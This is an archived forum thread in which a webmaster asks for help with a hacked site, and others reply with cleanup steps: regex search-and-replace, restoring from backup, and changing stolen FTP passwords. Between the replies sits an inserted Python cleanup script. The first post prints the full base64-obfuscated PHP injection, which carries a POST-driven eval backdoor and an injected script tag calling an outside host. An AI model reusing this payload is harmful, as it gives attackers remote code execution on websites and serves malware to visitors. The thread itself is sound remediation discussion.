
i got tired with my site virus infection

Discussion in 'Security' started by jovany, Feb 18, 2010.

  1. #1
    Hello,
    My site is infected with a virus which closes my site when I open it, due to a PHP script whose code I discovered at the top of my page when I checked my site in cPanel. The code is:

    <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZHhlbScpKXtmdW5jdGlvbiBkeGVtKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJ4dmRXbHphV0Z1WVdwaGVucGpiSFZpTG01bGRDOXVaWGR6YVhSbEwyMTFjMmx4ZFdWelgyRnBiR3hsZFhKekxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBkeGVtMigkYSwkYiwkYywkZCl7Z2xvYmFsJGR4ZW0xOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRkeGVtMSkpY2FsbF91c2VyX2Z1bmMoJGR4ZW0xLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkeGVtJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnZHhlbScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRkeGVtbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZHhlbTInKSkhPSdkeGVtMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

    and when I check the source of my site using Firefox, I see that PHP script:

    </head><script src=http://louisianajazzclub.net/newsite/musiques_ailleurs.php ></script>

    which is strange for my site. When I deleted the long code above, nothing changed, and the site began to lose visitors because Google has reported that my site harms computers.
     
    jovany, Feb 18, 2010 IP
  2. WeWatch

    #2
    You need to remove all the malscripts from your site and then request a review from Google's Webmaster Tools.

    If you have a known good backup, you can delete your site, then restore it from backup. If you don't delete it first, you can miss backdoor files that hackers insert on websites so they can re-infect them after you've cleaned it.

    Do you have your site downloaded onto your PC? If so, you can use a tool like grepWin to clean your site. It's free. Google it.

    For the search string to remove the first line you identified you can use:

    <\?php\s*eval\(base64_decode\(.*?\)\);\s*\?>
    And for the other string you found you can use:

    <script\s*src=http:\/\/.*?\.php\s><\/script>
    Then set these options:

    uncheck Search case-sensitive
    check Dot matches newline
    check Create backup files
    uncheck Treat files as UTF8

    select All sizes
    check Include system items
    check Include hidden items
    check Include subfolders

    Then set your Search in: to the folder where you've downloaded your website files and select Search first.

    Then look at the files in the Search results window. You can right-click on them to see the malscript.

    Then close the file and hit Replace. It will create backups of your original (infected) files and you'll have clean files to upload to your website.

    Then, since this is typically the result of a virus that steals FTP login credentials, you'll have to first change all FTP passwords, then scan all PCs with FTP access to your website for viruses.

    These viruses know how to evade detection of the currently installed anti-virus programs so you may need to use something different.

    Many have had good success using one of these: Avast, F-Prot or Kaspersky.

    Also, if you're using one of the free FTP programs, many of them, like FileZilla and CuteFTP, store their saved logins in a plain text file, which makes it really easy for the virus to find and steal the FTP credentials.

    I use WS_FTP because they encrypt their passwords.

    Post back here if you have further questions.
     
    WeWatch, Feb 18, 2010 IP
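The cleanup WeWatch describes (search a downloaded copy of the site with the two patterns, back up each infected file, strip the injected code), written as a script rather than a grepWin run, plus a static decode of the base64 payload from the first post so it can be read without ever being executed. This is an added example, not code from the thread or from grepWin. The sample infected file, its payload and the example.invalid URL are constructed, the helper names are mine, and the whitespace before the closing `>` in the second pattern is relaxed to zero-or-more.

```python
"""Offline triage and cleanup of a downloaded site tree for the two injections
discussed in this thread. Added example; assumes the site has been downloaded
to a local folder and that the injected code matches the two patterns."""
import base64
import os
import re
import shutil
import tempfile

# The two search patterns from the thread. DOTALL mirrors grepWin's
# "Dot matches newline" and IGNORECASE its case-insensitive search.
PHP_EVAL_RE = re.compile(
    r"<\?php\s*eval\(base64_decode\(.*?\)\);\s*\?>", re.DOTALL | re.IGNORECASE)
SCRIPT_RE = re.compile(
    r"<script\s*src=http:\/\/.*?\.php\s*><\/script>", re.DOTALL | re.IGNORECASE)
# Pulls the quoted base64 literal out of an eval(base64_decode('...')) call.
B64_LITERAL_RE = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")

# Constructed sample: a harmless payload and a placeholder script host,
# laid out like the two injections reported in the first post.
SAMPLE_PAYLOAD = base64.b64encode(b"echo 'constructed sample';").decode()
SAMPLE_INFECTED = (
    "<?php eval(base64_decode('" + SAMPLE_PAYLOAD + "')); ?>\n"
    "<html><head><title>shop</title>\n"
    "</head><script src=http://example.invalid/dropped.php ></script>\n"
    "<body>real page content</body></html>\n"
)


def decode_payload(snippet: str) -> str:
    """Statically decode the first base64 literal in an injected snippet so an
    analyst can read it. The decoded PHP is returned as text, never run."""
    m = B64_LITERAL_RE.search(snippet)
    if not m:
        return ""
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")


def find_injections(text: str) -> list:
    """Return a list of (kind, matched_text) for every injection in text."""
    hits = [("php_eval", m.group(0)) for m in PHP_EVAL_RE.finditer(text)]
    hits += [("script_tag", m.group(0)) for m in SCRIPT_RE.finditer(text)]
    return hits


def clean_text(text: str) -> tuple:
    """Strip both injection kinds; return (cleaned_text, number_removed)."""
    cleaned, n_php = PHP_EVAL_RE.subn("", text)
    cleaned, n_js = SCRIPT_RE.subn("", cleaned)
    return cleaned, n_php + n_js


def clean_tree(root: str, backup_suffix: str = ".bak") -> dict:
    """Walk root, back up each infected file beside itself (like grepWin's
    'Create backup files'), write the cleaned content back, and return
    {path: injections_removed}. Files are read and written as latin-1, which
    maps every byte to one code point, so untouched bytes round-trip exactly
    (the equivalent of leaving 'Treat files as UTF8' unchecked)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(backup_suffix):
                continue  # never re-scan our own backups
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1") as fh:
                original = fh.read()
            cleaned, removed = clean_text(original)
            if removed:
                shutil.copy2(path, path + backup_suffix)
                with open(path, "w", encoding="latin-1") as fh:
                    fh.write(cleaned)
                report[path] = removed
    return report


def demo() -> dict:
    """Build a constructed site tree in a temp dir with one infected and one
    clean file, clean it, and return {relative_path: injections_removed}."""
    root = tempfile.mkdtemp(prefix="site_")
    os.makedirs(os.path.join(root, "includes"))
    with open(os.path.join(root, "index.php"), "w", encoding="latin-1") as fh:
        fh.write(SAMPLE_INFECTED)
    with open(os.path.join(root, "includes", "clean.php"), "w", encoding="latin-1") as fh:
        fh.write("<?php echo 'fine'; ?>\n")
    report = clean_tree(root)
    return {os.path.relpath(p, root): n for p, n in report.items()}


if __name__ == "__main__":
    print("decoded payload:", decode_payload(SAMPLE_INFECTED))
    print("cleanup report:", demo())
```

Review the decoded payload and the `.bak` files before uploading anything: the script only removes text that matches the two patterns, so a site with other injected code, or with backdoor files that contain no such marker, still needs the delete-and-restore-from-backup approach WeWatch recommends.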
  3. Carl29

    #3
    Hi,
    I'm just one more who found some malware or a virus on my server.
    The site attacked was an OSCommerce installation and it's all over the PHP files; after decoding the encoded string I found all the "bad" files in the \admin\includes\languages\english\modules\index folder.
    Can you check the attached screenshot to see if you have any identical files.
    These files are full of information about other web pages, and the most used word is the affiliate program company "Forex".

    Thanks a lot :)
     
    Carl29, Mar 1, 2010 IP
  4. WeWatch

    #4
    WeWatch, Mar 1, 2010 IP